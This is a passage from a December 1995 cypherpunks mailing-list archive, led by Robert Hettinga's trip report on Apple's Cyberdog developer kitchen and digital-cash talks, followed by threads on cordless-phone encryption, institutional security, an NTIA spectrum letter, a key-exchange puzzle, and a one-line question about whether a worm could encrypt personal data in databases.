one could do financial cryptography, and how developers of cyberdog
parts could sell them on the net, preferably on a direct-to-the-customer
basis, and for cash -- anonymous, of course;-). I had managed to get a
"seat", a Mac, in other words, so that someone who actually was
crypto-code-clueful could come in, and at least get up to speed on
Cyberdog, and go play with it elsewhere.

"Elsewhere", because of the ITARs of course. It seems that there were
foriegn nationals in the room, Apple legal was more than a little bit
concerned that something would be misconstrued somewhere in the bowels
of Blair House. Also, there's the interesting problem of crypto-hooks as
tanamount to crypto itself. I talked to more than one developer who
thought he had skirted the ITAR issue all together, just by leaving
crypto APIs there for other people to use.  We had fun telling them all
about just how hard their tax dollars were working *against* them in
this regard.

Anyway, all this "elsewhere" stuff was just fine, because the person I
*could* get on such short notice, who was both crypto and OpenDoc
capable, was Dave Del Torto, who could only show up for one day.
However, in Dave I got cluefulness personified. Dave has done work for
Qualcomm on Eudora, Digicash on ecash, and was under NDA to Apple for
OpenDoc and Cyberdog already, and in addition, going to try to walk in
with what there was of the PGP 3.0 code. Also, there were at least two
well-respected Mac.Cypherpunks there working on code for their
respective employers, not to mention several crypto/e$ people from
Apple, all of whom were personally interested, and who will remain
nameless. I was pumped.

Playing around with the demo internet parts that Apple provided for
Cyberdog was fun. Rather than a monolithic application like Netscape
loading up when you start up a cyberdog part, you start up the part
itself, and nothing else. When your browser needs mail it calls your
mail part. When your newsreader needs to browse it calls your browser
part. Of course, they can all call crypto or e$ parts as they need to.
There's a history part that records where you were and what you did in
URLs, and there's a notebook part you can stick URLs into if you want to
keep them.

The coolest ah, part, about all of this is that every one of these parts
can be interchanged. It's also easy to see that if something gets
popular like web-browsing, and people keep adding features to browsers,
someone can come along and sell parts that do those features better than
the browser itself can do, like bookmark management, for instance, and
sell them separately. Feature creap dies in its tracks.  This process is
exactly the kind of "surfactant" effect that I had observed with the
internet, which dissolves information into more and more dispersed
pieces, and which had gotten me into all this trouble in the first place
with the rant and the InfoWorld article.

Couple this with the potential for geodesic markets on the net with e$,
particularly with digital cash an micropayment schemes, and I thought I
had something to say to these folks, which is why I was brought here to
speak here in the first place. In an auditorium. With cameras and lights
and videotape. And an audience with 200 people in it. As I had never
actually done this before, I was feeling a little like Dustin Hoffman in
"Rain Man": "V-E-R-N, Vern..."

So, along about noon, we jump back into Vinnie's assault vehicle (by
granola-land standards, anyway) and we go to said auditorium, called
"Town Hall". There, I spoke about, according to my notes, <big intake of
breath> the books "Out of Control", and "Applied Cryptography", The rise
of the pyramid paradigm, Bucky (Fuller) and Pete (Huber), The net as a
geodesic and information surfactant, OpenDoc as geodesic software and
code surfactant, cypherpunks, strong cryptography, anonymity,the four
hoursemen, digital cash and digital bearer certificates, chaotic
capital, Financial Cryptography for Dogs (Teaching Cyberdog to send you
money in the mail), and of couse, Dissolving the entire status quo into
a cloud of self organized chaos. <exhale...>

All of which took 45 minutes of the hour and a half I was allotted.
Fortunately, about 15 minutes into the Q&A period, I was rescued by Eric
Hughes, who showed up with black cowboy hat (which is how you identify
those "black hat" cryptographers, I'm told), to answer all the hard
stuff. I was greatly pleased, not only to get bailed out, but also to
meet Eric, who I'd only talked to on the net until a week before, when
we had had an actual phone call to get his appearance here arranged.

Probably the most interesting thing for me was watching Eric handle the
guilty titters the audience got when he talked about the profit one gets
from money laundering. "It's immensely liberating when thinking about
this stuff to think like an illegal operative", he said. Meaning to me,
of course, that you're not trying to break the law, but that you're
trying to think about how markets work in their, er, extra-legal,
unregulated form. Since a very large part of financial cryptography is
about how to prevent being cheated in an on-line transaction without
recourse to the law and eventually physical force, Eric's spot-on about
this.

Another thing he said that got me to thinking was that the "foregone
alternative", or opportunity cost of removing advertizing is equivalent
to the amount someone spends on sending you advertising. If, for
instance, an advertiser spends $1 to spam your mailbox, it's probably
going to have to be worth at least 1$ for you to block him.

After my talk, Eric, Sameer (also in a black hat) and I were asked into
a what turned to be a brainstorming session with several people from
Apple and other places, who pumped us (mostly Eric, of course) about how
best to implement digital signatures as quickly and securely as possible
in the Mac OS, given that Apple's RSA-signatures-in-Powertalk idea isn't
getting very far. Maybe something will come of it, maybe not. Hope so.

After that, I went back to the Cyberdog Kitchen with Vinnie, where we
met Dave Del Torto. Dave and Vinnie thrashed Cyberdog, and I schmoozed
people and thrashed e$pam until dinner. After dinner, I went home to
Vinnie's and crashed at the ungodly hour of 8:30.

Thursday

I wake up at 6:30 this time, and, checking the bank, find out that a
wire from one of my sponsors for the e$ lists has arrived. Happy, Happy,
Joy, Joy. That makes two, and I'm looking for 2 more for the time being,
so send me e-mail, if you're interested, or check the web page at
http://thumper.vmeng.com/pub/rah/ for more details.

Speaking of poor thumper, we upgraded the web software to WebStar, but
the problem now is the list server, running on some freeware called
MacJordomo, which works for normal applications, but was giving us fits,
and crashing the server with annoying regularity. Vinnie got it
rebooted, and we made an appointment to go see thumper for some surgery
on Sunday afternoon up in Walnut Creek.

Vinnie and I pile into his truck, almost accidentally monster-truck
ourselves over someone with a no-fur vanity plate whose Tercel stops too
suddenly, and went to his office so he could get caught up a little bit,
after the obligatory triple espresso caffiene stack and vegetarian's
worst nightmare for breakfast. Vinnie says something about this being an
anabolic diet that weightlifters use. Actually, I started this about a
month ago, and it works so far. I've lost about 25 lbs, and have only
165 to go...

Vinnie, in his role as "Bob-handler", has negotiated a slot on the
speaking schedule at the Cyberdog kitchen so I can rant at the people I
came here to pay attention to in the first place, the people coding
dog-parts... Yes, there's a joke, and I'll tell it later.

So, I give a more Cyberdog-specific version of yesterday's talk for
those who missed it. I got assisted from the aforementioned Cyberdog
cypherpunks (Cypherdogs?... Nah...) on the uh, hard parts... The most
important thing I tried to get across was the idea of parts paying their
authors by mail. A part asks for money to be sent to the author, who
sends the part a signed operating certificate, which enables the part to
run.

After lunch, Vinnie and I get on the road for San Francisco, stopping
first for a pair of Lee Oskar harmonicas, in the key of A. I decide it's
time to teach Vinnie how to play cross-harp. So I teach him how to bend
a few notes while telling him about how I used to walk home from
Fidelity in Boston wearing my blue suit, red tie, white shirt, and
wingtips, walking into the sun, so I needed sunglasses, smoking a 45
minute Macanudo baseball bat, because I had enough time to smoke it, and
playing blues harp, because I could, and the walk was boring...

We're going to see a friend, who will also remain nameless for the time
being, and who has just set up shop on Market street. After swearing me
to secrecy, and swearing Vinnie to enforce my secrecy (good move that,
swear Vinnie to anything, and it happens), they tell all about what
they're up to, and it's big.  Very big. The more I think about it, the
bigger it gets, until fiinally I force myself to look out of the eighth
floor conference-room window, and down Market Street. Sure enough,
lumbering up from the waterfront is the Sta-Puff Marshmallow Man,
straight out of Ghost Busters. I shake my head, and it goes away...

So our friend and some of his friends go to a hotel lobby, where Vinnie
gets to smoke a Cohiba for the first time, and then on to "Stars" for
dinner, and then home to sleep in Vinnie's living room. Bizzarre dreams
about the Marshmallow Man, drinking triple-espresso-in-black-coffee...

Friday

The last day of the CyberDog Kitchen.

People are rushing around to finish their demo Cyberdog parts before
show and tell this afternoon.

I thrash e$pam some more, and meet with Stephen Humphrey, a contractor
to Apple from Salt Lake City, who's writing a book on OpenDoc, and who
seemed to be Apple's front-line code resource person at the kitchen. We
talked about possible payment APIs for Cyberdog, and his forthcoming
book, which I'm writing the preface for, for which he's going to pay me
a few bucks in Mark Twain Bank's ecash, just so we can say we did it.

I also talked Steven Roussey, of PartMerchant. He's developing a server
which will sell OpenDoc parts on the net directly to Cyberdog users as
they need them, and he's going to settle his transactions in ecash,
among other things. It turns out, he *is* writing a payment API for
Cyberdog, so that a part can hold the user up for money at periodic
intervals and send it to the developer, through PartMerchant initially,
but certainly in the long run, developers with permanent net presences
can use this same API to collect their revenues directly. To me, that
means a rather interesting scenario where copyrights and patents matter
much less because developers get paid for the code which is being
*used*, eventually maybe at runtime, and certainly at periodic
intervals, or at a flat rate, or whatever the market will bear. I
thanked him for all his efforts. Effusively.

After lunch, it was time to do a "show-and-tell" of the Cyberdog parts
that people had built in the past three days.

People had done all sorts of stuff, including various tweaks on the
reference Cyberdog parts to see if it could be done. The most important
thing for me was seeing Java run in an OpenDoc part. This meant several
things to me. The first is that I keep getting people telling me that
Java and OpenDoc are competitors. Quite obviously, that is not the case.
Java can run in any container, including OpenDoc containers. It also
means that if competition for Java comes along, OpenDoc can run that,
too. This also means that the need for monolithic applications to run
Java, like Netscape, or any wild fantasy of Microsoft, is nonexistant.

This becomes important because Macromind has a Java-equivalent, and it
proves that others will follow. Just download a part on the fly from the
PartMerchant, and you can run those scripting languages too.

To me, the whole idea of economies of scale  gets turned on its head in
this kind of "geodesic" environment. If someone likes Java, they can
write something better, and someone else will write a Cyberdog part to
handle it. If someone likes that part, they can write a better one, and
so on. This Darwinian, er, dog-eat-dog world can only lower software
prices, and make better software. The people who benefit are the small
developers, because they move, and can get paid, faster.

I look at Apple like the US in the early 19th century, letting people
homestead on the land by giving it to the people who develop it. Lincoln
had to do nothing but give away rights of way to the railroads to make a
transcontinental line a reality. Apple licences OpenDoc to developers as
cheaply as possible, maybe giving it away as much as possible, and all
these developers make Macs the platform of choice on the net, selling
more Macs and Mac-clones in the process, just like the homesteaders made
the land they moved onto more valuable, and eventually taxable. Only
this time, there is no pristine wilderness or native americans to abuse.
Cool.

Finally the dog-part joke. Someone, riffing on the BBEdit "It doesn't
suck" slogan said, "Cyberdog doesn't suck..." and someone in the crowd
finished the sentence with  "...it licks!", and someone else said,
"Because it can!". And then there was a massive "EEEEWWWWWWW" from
everyone else...

Now *that* was disgusting... Oh, well, they'd been working from 8 AM to
midnight plus for 2 days...


After the show and tell was over, the kitchen was over, but Vinnie and I
hung around for a while as people were packing up all the Macs Apple
provided for the kitchen. While chatting with some of the OpenDoc
evangelists, we talked about how OpenDoc, just like the net, was just
like this vast unexplored territory. I said that Lincoln built the
transcontinental rail road with  -- and the woman who was the division
head for all the OpenDoc evangelists finished my sentence and said "land
grants!" with the strangest smile on her face. I think I connected
there...

After that, Vinnie and I packed up and went over to his office, hung out
there while Vinnie did some of his own work, and then went out for
dinner with a bunch of DTS people.


Saturday

I wake up at a normal time. Vinnie and I go out to Gold's gym and thrash
weights with his buddy Ray from DTS, who's been working for Apple for 14
years and is, pound for pound, about the strongest guy I've ever seen.

After breakfast, the purchase of two boxes of Macanudo "Prince Phillip"
cigars, a visit to Rochester Big & Tall, and renting a tux for Vinnie
for the Apple Christmas party, we pick up Cynthia, who's Vinnie's
friend, and who, in addition to building the Apple OpenDoc website,
helped Vinnie clang trashcan lids together to get people into the
audience for my talk on Wednesday, not to mention asking pertainent
NetGAK questions of Eric during the talk itself.

Vinnie, Cynthia and I pile into her car and head out to a cypherpunks
party somewhere in the hills near Los Gatos. After missing the turnoff
twice in both directions, we finally arrive at a geodesic dome. Not
missing the irony of this, having just given a talk at Apple on
"Geodesic Software and Financial Cryptography for Dogs" I have to laugh
a bit.

This is an honest-to-goodness, straight out of the Whole-Earth Domebook,
back to the land, llamas-and-all geodesic dome, complete with naked
hippies in the hot tub. I come to the conclusion that this is going to
be a great party, even if I only know people from what they've written
on cypherpunks. I saw Sameer and Sandy Sandfort, who I had met earlier
in the week, and Eric, of course, who was holding court with Roger
Schlafly about patent esoterica when I came in. I saw Raph Levien, and
the guy (sorry, can't remember all names) who was working on PGP3, who
had a single paper copy of the PGP3 API to pass around, and Eric
peppered him uncomfortably with interface call questions, ending most of
Mr. PGP3's answers with "Oh, well, we'll wait until it's released, and
then we'll deal with it",  that is until someone let it be known that
the hot tub was in fact open for business. At that, Eric fairly
scampered out of there for the back porch, where the tub was.

A little later on, after I was introduced to "the guy who wrote the game
Gorp", who did something much more important later but I can't remember
what, I had fun just sitting there in a denim bean-bag chair, looking up
at the dome's ceiling, listening to people rant crypto for a while, with
Cynthia noticed that, besides broad-brimmed black hats, cryptographers
all have these Tolkein-wizard pointy goatees. Made me glad my attempts
at facial fur had been constantly interrupted by the need to "clean up
for company", me not being a real cryptographer and all...

One of the people I met was Mr. Weinstein from Netscape. We chatted for
a while, and I told him that he had probably won this year's Black Rhino
Ammunition Inc. "Mr. Kevlar" award for his service in the cause of
cypherpunkdom. He laughed. I didn't tell him that Black Rhino Ammunition
was a fictional company dreamed up by the gun lobby to get a rise out of
the Clinton administration, and that the Clinton administration had
risen so much that they had banned the fictional company's fictional
Kevlar-penetrating bullets... That, of course, was off-topic. ;-).

Vinnie broke out one of the boxes of baseball-bat-sized Macanudos, and
we proceeded to hang out on the back porch ourselves, killing insects
and gagging llamas with tobacco fumes. I offered some to the naked
hippies in the hot-tub, but they had better things to do than to stand
wet and naked on a cold back porch smoking cigars. Eventually Vinnie and
I were joined by three or four others, and their various frowning
spousal and virtual-spousal units. A good time was had by all, albeit a
little on the cold side, until Vinnie looks at my watch (Vinnie doesn't
wear a watch) and says "Oops. Time for the next party", and I went in to
get my Mac from behind the chair Eric was sitting in before he cornered
Mr. PGP3 and then galloped off to the hot tub.

This chair now had another guy sitting in it, and, as I had been doing
all evening,  I introduced myself, by way of retrieving my Powerbook. It
was Tim May.

I laughed, and shook his hand goodbye, which must have puzzled him a
bit, got my Mac from behind him, and split.  Tim May looks much
different in person than he does on the net. On the net, he's this
short, skinny-but-muscular, pushy guy with no beard who looks too young
for his age. In person, he's exactly the opposite on all counts. Gooo
figure.

We headed into San Jose and the house of one of three people at Apple
with the title of "Scientist". The guy who answered the door looked like
a biker. Actually, he was a biker, colors and all. He was also the
"Scientist", who had just achieved that apellation by working up through
the ranks from Vinnie's department, Developer Technical Support. A very
smart guy with an amazing collection of CDs (including the entire
DiMeola canon), early 60's Dodges and Ramblers, guitars (including a
1959 Stratocaster), and, of course, Harleys. He also had a very hairy
persian cat, named Freddy, and whose full name wouldn't surprise me if
it was "Fat Freddy" of Fabulous Furry Freak Brothers fame...

So, after the birthday party's birthday person opened all her gifts,
Vinnie and Cynthia and I took off, leaving the remaining Macanudos
behind for our esteemed host. We expect his outside smoke breaks on the
Apple campus to take on the order of 45 minutes, while the cigars last,
anyway...

Sunday

Today's mission was to go to Walnut Creek, where both my in-laws and the
beleagered e$ server thumper lives.

After we had breakfast with Jeff, of hard-drive durability test fame,
who gave me all his old PowerBook 100-series batteries and chargers,
Vinnie and I went up to Walnut Creek. We had lunch with my
brother-in-law and nephew, who gave me warm regards from most of my
other in-laws, who all came down with the flu that week, ;-), exchanged
Christmas gifts right there in the Buttercup Diner, and then went on to
the AG Group, where thumper lives.

The AG group makes network monitoring software like Etherpeek and
Skyline, and one of Vinnie's friends, a founder there, had let us hang
thumper off of their internet feed. After thanking him for letting us
in, and for putting thumper up for the duration, and hearing *him* thank
his lucky stars he wasn't parasailing on Mt. Diablo this afternoon --
where the winds had just piped up to 70 mph -- we went into AG Group's
machine room and began to perform brain surgery on thumper. Thumper, who
started life as a Quadra 950 running httpd and Macjordomo, is now a
PowerMac 8100 running WebStar and, soon, ListStar. We munge around on it
remotely with Timbuktu, and, since we were having so much trouble
between AIMS and MacJordomo, we're going to drop in AutoBoot so we won't
have to have someone manually restart it for us.

We brought up ListStar, and, deciding that it was way too much work to
do that afternoon, brought it back down to prototype the e$ lists
remotely and then upload them later. So now, we're waiting for a break
in schedule so that we can do just that, sometime this week. I hope.

So, we went back to Vinnie's house, by way of Fry's to pick up a battery
brick, and Warehouse, to get the videos "The Decline of Western
Civilization", and "Dazed and Confused".  It seems that Vinnie wanted to
relive his lost youth on both counts. Cynthia came over, and she, Jim
(who's Vinnie's roomate), Vinnie and I ate pizza and watch Vinnie
fast-forward through most of "Decline", except for watching the "Fear"
segment twice, and then we actually watched all of "Dazed", which put a
lump in my throat, seeing as I was Lafayette HS, '77, and in Vinnie's
too, as he was Boston Latin '78. It seems this movie has cult status.
Has nostalgia arrived for 70's dopers and acid casualties? It seems to
have happened...

After that, I thrashed e$pam and went to bed.

Monday

Vinnie had to help with the Open Transport kitchen. I hung with Cynthia
for a while, and then we went down to the cafeteria, and met Guy
Kawasaki getting his breakfast. Cynthia introduced me to him, and he
gave me a "why should I know you?" look, but I did get to shake the
man's hand, which means now I never have to wash it. Ewwwwwww.

Finally, we went back to the Open Transport kitchen where Vinnie was
working, said bye to Vinnie, and Cynthia took me to the airport, put me
on the plane, and, as soon as we leveled off, I started writing this on
shipwright.com. The battery brick works great.

When I got home, I asked my wife how church was that morning. She said,
"Bob, it's Monday." Oh. Right. It's Monday...


Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNIti/gyLN8bw6ZVAQHzxwP/V1qCuwb5XAkyKxr3Tdkafwd/WcBhAKAb
NVXryVnChBa1DmmL6UA24ZVIeO3ELZkkYc5N+4e5qsG5zE0gIt00ZP0NXEpr8Xxl
AioYwTIvKt5sJKLzBb/uNxnivKuIU9zLwqJiJ4NwIzZDvfzUi9EdhPWV9Y42bQ5J
+rnQpWEMtpA=
=PXfA
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 16 Dec 1995 13:45:21 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <9512160230.AA27216@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer wrote
> 
> 	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
> the same thing. I figure it uses a weak cryptosystem. There is
> something about key setup when you return the handset to the base.
> 	(The phone was $200, FWIW)
 
> Dan wrote: 
> > I saw a new cordless phone made by Motorola in a retail outlet today
> > that is supposedly "Secure from eavesdroppers."  I asked the
> > salespeople for more technical info, but they weren't very helpful. 
> > Does anyone have any information on this?  I didn't notice any "Not
> > for Export" stickers on the box, and the ITAR does cover
> > spread-spectrum technology.  So is it analog or digital?  Is it just
> > doing simple analog tricks, or is it encrypting a bitstream?  Clipper
> > maybe?  I doubt it.  Any info appreciated.
> > 						Dan

    I've also got an ATT 9000. It's one of the digital 900Mhz phones, and
has no encryption.  It claims extra security due to being digital - your
average 14 year old's scanner is analog only. 

    There's a bunch of frequencies. The frequency to use, and 
(fairly small (16bit?) security code gets reset when the receiver is
put on it's stand. The code is used only for a handshake, so several
phones in the same area won't interfere by accident. It is not 
frequency agile - the same freq is used throughout the call. 

    It's a good phone - nice tone, long range, and it's secure
against jerks with scanners. Secure against serious eavesdroppers
it's not.

    When I bought it a year or so ago, I also looked at another phone
from (I think) Uniden, which *was* frequency agile. I was intrigued
enough to call the manufacturer, and confirmed that it did indeed
hop frequencies while the call was underway. How often, and
how the next frequency was determined was not known by the 
guy I talked to, and I balked at the $350 price. 

speaking for myself

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 16 Dec 1995 13:55:30 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: .PWL spin
In-Reply-To: <Pine.ULT.3.91.951215142347.14138O@Networking.Stanford.EDU>
Message-ID: <9512160258.AA17014@all.net>
MIME-Version: 1.0
Content-Type: text


> > > What would make a University less secure than a corporation??
> > 
> > Ostensibly, universities in the interest of academic freedom and 
> > promoting learning usually don't have nearly the same draconian measures 
> > that corporations have.
> 
> More to the point, us poor professional staff don't stand a chance 
> politically against students and faculty. We support whatever they want 
> to use.
> 
> I think it's more an issue of control. Ford IS can say Thou Shalt Not
> turn on SAP advertisement, and people will listen (or go away). At major
> Universities, what we do with troublemakers is, we hire them.

I think your impression of the corporate work environment is a bit naive,
just as most people in the commercial environment have misimpressions about
university environments.

In universities, the faculty rules - sort of.  The administration also
has a great deal of power as is usually wielded by the deans.  In
corporations there are often several levels of management, each with
control and responsibility.

Just as a university president has little chance of success in ordering
something that is viewed by the faculty as a breach of privacy or heavy
handed action, the CEO of most companies is similarly constrained.  In
fact, it would be rare that either would get involved is this level of
decision. 

If Ford IS said "Thou Shalt Not turn on SAP advertisement" and someone
in Ford's engineering department had a requirement for SAP advertisement
in order to service a major customer, the IS department would fail (and
the person responsible for making the decision might be surprised at how
fast the human resources department can act).

> But back to the point, the anonymous (cypherpunk relevance) "system 
> administrator" (guess they couldn't find anyone willing to make a fool 
> of himself on the record?) who said that Universities would be hurt more 
> was wrong. We just don't have passwords on Win95 machines, or don't care 
> if they're compromised. It's the people at Ford, Dow, and Sprint, 
> which had wasted man-years putting together "policies" and "user 
> profiles" that have proven to be worse than useless, who are pissed off. 

In my experience, it is rarely the case that eaither a university or a
business is well protected.  Comparing one to the other is probably not
very useful.

One thing is for certain, however.  The vast majority of the professors
in computer science don't understand anything of substance about
information protection.  If you tried to tell them about it, chances are
they would rebuff you for your attempt.  Furthermore, professors of
computer science almost never perform systems administration duties for
the university computer center.  The computer center is almost always
run by professional staff not affiliated with the computer science
department. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Sun, 17 Dec 1995 08:25:08 +0800
To: "'cypherpunks@toad.com>
Subject: taking electronic privacy into our own hands
Message-ID: <01BACBCB.01742B20@king1-21.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Would it be possible to write a program ( i.e. a worm or Trojan)  to ferret out personal information that is stored in databases and encrypt it?
I was just wondering what such an undertaking would entail.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tkalil@ARPA.MIL (Tom Kalil)
Date: Sat, 16 Dec 1995 14:10:14 +0800
To: cypherpunks@toad.com
Subject: Status of Apple proposal for wireless NII Band
Message-ID: <acf7b409000210041c11@[192.48.218.187]>
MIME-Version: 1.0
Content-Type: text/plain


The Administration sent a letter to the FCC asking that they move forward
on the Apple and WinForum petitions.

The Administration's reasons for supporting the allocation are given
below.  The full filing is on the NTIA server at http://www.ntia.doc.gov


>>
>>
>>                                    November 2, 1995
>>
>> The Honorable Reed Hundt
>> Chairman
>> Federal Communications Commission
>> 1919 M Street, N.W.
>> Washington, D.C.  20554
>>
>>      Re:  RM 8648, RM 8653
>>
>> Dear Chairman Hundt:
>>
>>      This letter addresses the petitions for rulemaking filed
>> before the Commission in May 1995 by the Wireless Information
>> Networks Forum (WINForum) and Apple Computer Company, Inc.[1]
>> Those petitions request the allocation of certain spectrum in the
>> 5 GHz band and the adoption of service rules for shared
>> nonlicensed personal radio network devices.  Both the WINForum
>> Shared Unlicensed Personal Radio Network (SUPERnet) devices and
>> the Apple National Information Infrastructure (NII) Band devices
>> would allow operation of nonlicensed, high-speed, wireless
>> networks with multimedia capabilities.  NTIA believes that these
>> new wireless technologies have the potential to enhance education
>> and other community services.  Implementation of these networks
>> and the feasibility of spectrum sharing between the proposed
>> devices and Federal users should thus be fully explored by the
>> Commission.  We therefore recommend that the Commission proceed
>> with a Notice of Proposed Rulemaking (NPRM) so that the policy
>> and technical issues raised by the petitions may be addressed.
>>
>>      NTIA serves as the principal adviser to the President on
>> telecommunications and information issues, including the
>> Administration's NII and Global Information Infrastructure
>> initiatives.  In addition, as Federal spectrum manager, NTIA
>> shares with the Commission jurisdiction over the frequency bands
>> under discussion in the petitions.  NTIA believes that the
>> proposed WINForum and Apple devices could provide an important
>> means of nonlicensed wireless access to the NII.  Wireless
>> networks can be more affordable than wired networks.  Schools,
>> hospitals, businesses, and others would thus have convenient
>> access to communications networks with voice, video, data, and
>> graphics capabilities without the expense and disruption that
>> installing wired systems would require.
>>
>>      As you know, the President and Vice President have launched
>> an important initiative to connect all of our classrooms,
>> libraries, hospitals, and clinics to the NII by the year 2000.
>> This initiative, which promotes expanded access to computers,
>> teacher training, and the development of compelling educational
>> applications, has the potential to revolutionize our educational
>> system, changing the way teachers teach and students learn.
>> Students will be able to collaborate with their peers around the
>> world, search digital libraries, use remote scientific
>> instruments, and take "field trips" to on-line museums.  As
>> President Clinton said in a recent speech, "[e]very child in
>> America deserves the chance to get the high-tech know-how to
>> unlock the promises of the 21st Century."
>>
>>      For this reason, the Administration strongly supports
>> spectrum policies that will promote affordable, high-bandwidth
>> wireless computer networks.  Wireless networks, and nonlicensed
>> networks in particular, can be a cost-effective approach for the
>> countless schools in our Nation that need connections to the NII
>> to enhance learning opportunities and provide young Americans
>> with the skills they will need in the future.  Wireless networks
>> may be an important option for schools because they often face
>> limited budgets and are prevented from entering the Information
>> Age by inadequate wiring.  Furthermore, the proposed devices
>> could allow more students to have network access directly at
>> their desks in their classrooms instead of in computer labs in
>> other rooms.
>>
>>      Other users will benefit from nonlicensed wireless networks
>> as well.  Small businesses that lack adequate wiring and that
>> cannot afford access to wired networks could have affordable,
>> convenient wireless access to multimedia networks.  Such access
>> could enhance productivity and efficiency.  Health care providers
>> would have the ability to transmit patient data, such as x-rays
>> and MRI images, video recordings, medical charts, and other
>> records, which would dramatically improve the efficiency of
>> medical staff and ease the group diagnosis of medical cases.
>> Moreover, NTIA believes nonlicensed wireless components of the
>> NII will provide significant opportunities for innovators and
>> small companies to make contributions to the overall mix of
>> products and services available through the NII.[2]
>>
>

*********************************************************************
Thomas Kalil
Director to the National Economic Council
The White House
Washington, DC 20500
(p) (202) 456-2802
(f) (202) 456-2223

"What do we want?  Bandwidth!  When do we want it?  Now!"
*********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 16 Dec 1995 19:32:42 +0800
To: cypherpunks@toad.com
Subject: The Elevator Problem & Groucho's Duck
Message-ID: <199512160537.AAA23233@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 14, 1995 04:44:12, 'futplex@pseudonym.com (Futplex)' was kind enough
to respond to my post on the elevator problem. 
 
I thought his response was insightful and appropriate but that the
description of the problem had changed a bit since the problem was first
posed. 
 
Thus this post. 
 
I've been thinking of the old game show hosted by Groucho Marx. You would
"say the secret word and win $100." 
 
Getting the $100 was easy. The duck would drop down on a string with the
money in its beak and you'd just pluck it out. Saying the secret word was
also an easy problem to hack. You could just read the dictionary. Of course
this hack didn't work in real time because the show only lasted 30 minutes,
Groucho did most of the talking, and you had to say the secret word in
normal conversation. All of this rather "limited the bandwidth." 
 
The elevator problem remains somewhat undefined as a problem. Several
parameters are boundaries within which the basic problem must be solved.
Two parameters are the length of time Alice and Bob will spend coupled
against the desired level of security. 
 
Highly specific solutions are effectively impossible until these parameters
are defined (or at least approximated). 
 
However ... 
 
My original solution involved a variation of Merkle's non-patented puzzles.
Futplex stated, correctly, that this took a goodly amount of time to
generate and transmit the puzzles and the security was "not so hot." 
 
My mind still returns to Merkle and the idea of solving the original
elevator problem that could be geometric for Alice and Bob while being
exponential for the other people on the elevator. The more I tried to focus
on this aspect of the problem the more I just repeated the problem in my
own mind. 
 
I felt that I was trapped in a "maze of twisty little passages, all the
same." 
 
At this point, this holiday season, I had an image of Merkle sitting by the
tree putting an infinite number of prime numbers in an infinite number of
boxes. (In the real world I've been fighting with my landlord and suddenly
thought of Cantor's first description of the landlord's dilema where a
landlord has an infinite number of rooms, all full, when another guest
shows up and wants a room.) 
 
At this point, I suddenly had an image of Cantor sitting on the floor next
to Merkle. Merkle would pack an infinite number of boxes and hand each box
to Cantor who would proceed to wrap each box in an infinite number of
sheets of wrapping paper. 
 
Suddenly, I saw that my first suggested solution put all of the major work
on Alice. She had to generate 10^6 prime pairs and send them all to Bob
then brute force an average of (10^6)/2 attempts to discover the one pair
Bob picked ot factor. 
 
This process *might* be speeded up if Bob would, Cantor-like, help out. In
other words, have Alice generate and transmit 10^3 prime pairs and have Bob
do the same. This cuts transmission time by 5*(10^5), a considerable
savings. 
 
Then Alice and Bob each have to brute force an average of 5*(10^2) attempts
to discover each others primes, for a similar savings. 
 
However, you still need a nonpatented algorythm that lets them use the four
primes to encypher their message(s) while forcing the others on the
elevator to factor an average of (10^3^2)/2 products instead of
2*((10^3)/2). 
 
This is still very far from a solution to the elevator problem as re-posed
by Futplex but creates at least one way of *potetentially* shortening the
prime generation and transmission time issue he was kind enough to point
out. 
 
I now feel that I am only "trapped in a maze of twisty little passages, all
different." 
 
Comment, Futplex? 
 
--tallpaul 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Dec 1995 18:38:12 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Seven Days
Message-ID: <acf7d93b0a02100457f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:32 AM 12/16/95, Robert Hettinga wrote:

[much elided]

>This is an honest-to-goodness, straight out of the Whole-Earth Domebook,
>back to the land, llamas-and-all geodesic dome, complete with naked
>hippies in the hot tub. I come to the conclusion that this is going to

I was one of the "naked hippies in the hot tub," for a couple of hours or so.


>This chair now had another guy sitting in it, and, as I had been doing
>all evening,  I introduced myself, by way of retrieving my Powerbook. It
>was Tim May.
>
>I laughed, and shook his hand goodbye, which must have puzzled him a
>bit, got my Mac from behind him, and split.  Tim May looks much
>different in person than he does on the net. On the net, he's this
>short, skinny-but-muscular, pushy guy with no beard who looks too young
>for his age. In person, he's exactly the opposite on all counts. Gooo
>figure.

???

Yes, I was surprised it was Bob, as I hadn't heard he was there. But, then,
I had been in the hot tub and was in a state of torpor even afterwards.
Also, I tend to sit and not partake of the frenzied shmoozing which so
often occurs at these parties.

I probably would've encountered Bob earlier if people were doing what I
urge them to do at my parties: wear name tags. (I have a pile of name tags
